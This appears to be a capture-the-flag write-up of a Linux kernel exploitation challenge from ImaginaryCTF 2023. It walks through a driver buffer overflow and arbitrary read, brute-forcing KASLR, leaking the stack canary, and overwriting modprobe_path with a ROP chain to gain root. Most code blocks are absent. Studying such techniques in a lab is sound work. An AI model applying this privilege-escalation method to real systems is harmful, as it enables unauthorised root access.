Imaginary CTF 2023 has just ended and it once again did not disappoint. The CTF featured a variety of fun and interesting challenges. Kudos to the organizers for yet another successful event.
One of the interesting challenges that I solved this year was window-of-opportunity, which is a kernelspace pwn challenge. In this writeup, I will share my thought processes and hopefully bring you some insights or new knowledge into the world of kernelspace!
Sometimes, there is a glimmer of hope, a spark of inspiration, a window of opportunity.
We are provided with some files, notably
Conveniently, if we look at src/Makefile
The author provides us a convenient way to compile, run and debug our exploit!
We can simply use the make
command to boot the kernel or make debug
to boot the kernel and attach GDB.
Using the decompress.sh
script, we can unpack initramfs.cpio
to give us our compressed file system used for the kernel.
The file that we are interested in looking is etc/init.d/rcS
, which is a shell script that is run on startup.
It might seem a little overwhelming, but I have added some comments to the script to make it easier to understand.
The following lines are some security features that are set by the rcS
script.
As you can tell, all three security features are in place to prevent unprivileged users from leaking any sort of information from the kernel.
This forces us to find a way to exploit the possibly vulnerable kernel driver instead of simply reading leaked pointers from the kernel or similar.
Apart from these security features that are enabled on runtime, there are other security features that are enabled when booting the kernel and can be found in run.sh
.
Based on the qemu command, the following protections are enabled:
For ease of debugging our exploits, we can disable some of the restrictions and change our startup shell to be a root shell.
Given that most modern kernel mitigation techniques are enabled, we will need to look for some powerful primitives that can help us work around these protections and still get to root.
We start from init_module
, which is a function that is run only once –- when loading the module.
This function simply registers a character device, and maps some interaction with the device to the corresponding function via the file_operations
struct.
Think of a character device like a MacDonalds drive-thru.
Just like how the MacDonalds drive-thru is a way for you to interact with MacDonald employees to get your order, the character device is a way for you to interact with the kernel module to do whatever you want it to do.
One way we can interact with the device is by writing to /dev/window
which would trigger the device_write
function.
If we try to decompile the code in IDA, we get some very weird code here.
Hence we will need to change the call type for some functions and fix up the code a little.
After cleaning up the code, we get something nicer like this:
This function is straightforward. If you haven't noticed, there is no bounds check for the amount of bytes that is copied from userspace to the kernel.
This gives us our first vulnerability, a buffer overflow!
However, as you can also see, there is stack canary protections. This prevents us from trivially wrecking the stack and corrupting our instruction pointer. We will have to find a way to leak a stack canary in order for our buffer overflow to be useful.
device_ioctl
function is also pretty straightforward.
Primarily, the function copies a request
struct from userspace into the kernel.
It then copies back any arbitrary space requested by the struct in userspace and copies it back to userspace.
Essentially, this function gives us a free arbitrary read, allowing us to read anywhere we want in the kernel memory.
So far, we have found two very powerful vulnerabilities inside of the kernel module.
With the buffer overflow, we can possibly write a kernel ROP chain to elevate us to root. However, in order to do so, we need to find a way to bypass KASLR so that we are able to find gadgets to use in our ROP chain.
Our arbitrary read requires us to provide an address, however, if we do not know any kernel address in the first place, how can we use the arbitrary read to defeat KASLR?
Answer: We can use the arbitrary read to brute force KASLR
In order to understand how and why it works, we need to first understand the following three concepts:
copy_to_user is fail-safe
copy_to_user does not fail even if the kernel address provided is not mapped yet, it simply copies a bunch of null bytes to the userspace buffer.
It only throws an error and fails when a kernel address is not physically mappable or does not have the appropriate permissions, which is not of concern to us in this writeup.
Unlike in userspace where the ASLR entropy can be as high as 30 bits (1073741824 combinations), the KASLR entropy is only 9 bits (512 combinations) due to space constraints and alignment issues.
we know the range of kaslr addresses to brute force
The physical address and virtual address of kernel text itself are randomized to a different position separately. The physical address of the kernel can be anywhere under 64TB, while the virtual address of the kernel is restricted between [0xffffffff80000000, 0xffffffffc0000000], the 1GB space.
By combining both of these concepts, we can abuse the arbitrary read via copy_to_user
in device_ioctl
to brute force the 9 bits of and find our kernel image base.
With all the information, we can write a simple script to brute force the KASLR to get our kernel base.
Voila!
Now that we have our kernel base, we can easily construct a ROP chain to do whatever we want.
However, we are unable to overflow the return address with our ROP chain without wrecking the kernel stack canary. In order to exploit the buffer overflow, we need to first find a way to leak our stack canary.
Based on previous decompiled code –- canary = __readgsqword(0x28u)
–- we can see that the canary is being loaded from gs:0x28
.
We can look at it in our debugger
However, by looking at the address of gs_base
, we can see that it is not within the kernel image base. If we reboot the kernel a few times, we can also see that gs_base
address is also randomized.
This means that we will have to find a way to either
Problem: The kernel image is so huge, how do we find a canary/pointer that we want?
Insight: Since the canary and the pointer to gs_base is all determined at runtime, we want to look for places that store data and is also writeable/modifiable at runtime.
We can look for pointers in the .BSS segment which is a segment within the kernel image that stores global variables that are only initialized at runtime.
By looking at the man page for nm, we can see the following
The /proc/kallsyms
file stores all the symbols (functions, variables, etc.) and the corresponding addresses for the kernel. It also follows the same convention as nm
. Thus we can easily search for BSS variables by using the following command
By scanning the BSS in memory in GDB, we can soon find an address that is at a relative offset from $gs_base
.
As you can see, there is a pointer at a relative offset to $gs_base
stored in an offset of 0x2744050 from our kernel base address.
Based on this finding, we can easily leak our stack canary.
With our canary and kernel base in hand, we are 60% to completing our exploit.
In kernelspace exploitation challenges, there are usually a few ways to escalate your privileges, some of the more common ones are:
For our case, given that we have an buffer overflow with nothing to stop us, we can take the approach of overwriting modprobe_path by calling copy_from_user
.
For the knowledge-hungry and curious minds, you can find more details about it here and here
A short summary of how the technique works –- when we execute a file of an unknown format, it will do a series of calls:
Ultimately, if the kernel is unable to identify the format of the binary, it will attempt to call call_usermodehelper_exec
which will execute the modprobe_path
string with root privileges.
By corrupting modprobe_path
to point to any arbitrary script that we provide, we can execute any commands we want in root privileges.
Ultimately, what we can do is:
/tmp/xpl.sh
with contents #!/bin/sh\nchmod 777 /flag.txt
/tmp/broken
with contents \xff\xff\xff\xff
/tmp/xpl.sh
/tmp/broken
which would trigger modprobe and set our flag file to be executableMost of the kROP chain is business as usual just like a userspace ROP chain.
We first extract the vmlinux
binary from the bzImage
using this script.
We can then obtain the gadgets using ROPgadget --binary vmlinux > gadgets.txt
command.
The only difference is that in kernelspace, after we finish our chain, we must return to userspace gracefully. The kernel is very fragile and will crash easily if you do not return gracefully.
In order to return to user-mode, swapgs must be called before iretq. The purpose of this instruction is to also swap the GS register between kernel-mode and user-mode.
Additionally, due to KPTI, we must swap back from the kernel page table to the user-space page table, otherwise we will meet a segmentation fault.
Instead of reimplementing the wheel, we can simply use the swapgs_restore_regs_and_return_to_usermode()
function to return to userspace gracefully.
Do note that we will also have to save and restore our userspace registers to return to user-mode gracefully.
The final payload is
After the CTF, I was looking through the writeups from other participants and I chanced upon an interesting exploit by a nasm (huge kudos to him for his awesome poc). That prompted me to do some research.
reference: mm.txt
extract from linux kernel lore
Seth found that the CPU-entry-area; the piece of per-cpu data that is
mapped into the userspace page-tables for kPTI is not subject to any
randomization – irrespective of kASLR settings.
Surprisingly, for the longest of time, cpu_entry_area
mapping in the kernel memory space has not been subjected to kASLR.
extract from lkml
Without it, these areas are a tasty target for attackers. The entry code and mappings are especially tricky code and this has caused some issues along the way, but they have settled down.
This is a very powerful attack vector, since leaking the kernel base and bypassing kASLR would now be trivial with any single arbitrary read primitive.
Understandably so, earlier this year, there has been a few updates to the linux kernel to randomize cpu_entry_area
and destroy this easy kASLR bypass.
However this led me to still be curious –- how long has cpu_entry_area
been unaffected by kASLR, considering that it was only patched recently?
The earliest article I found that mentioned about this dated back to 2017. I found it really interesting how this took 6 years to realize and patch. That was some really cool linux kernel lore!
I hope that this writeup was insightful and easy to follow, if there are any queries, feel free to reach out to me on discord via @caprinux. If you are interested in learning more about kernel pwn, you can follow some of the awesome blogs here
Thank you to the ictf team for the amazing CTF and challenges! I hope I win the binja license ^_^
Also, lots of respect for nasm for inspiring the last section of this writeup. You can find his full writeup for the challenge here.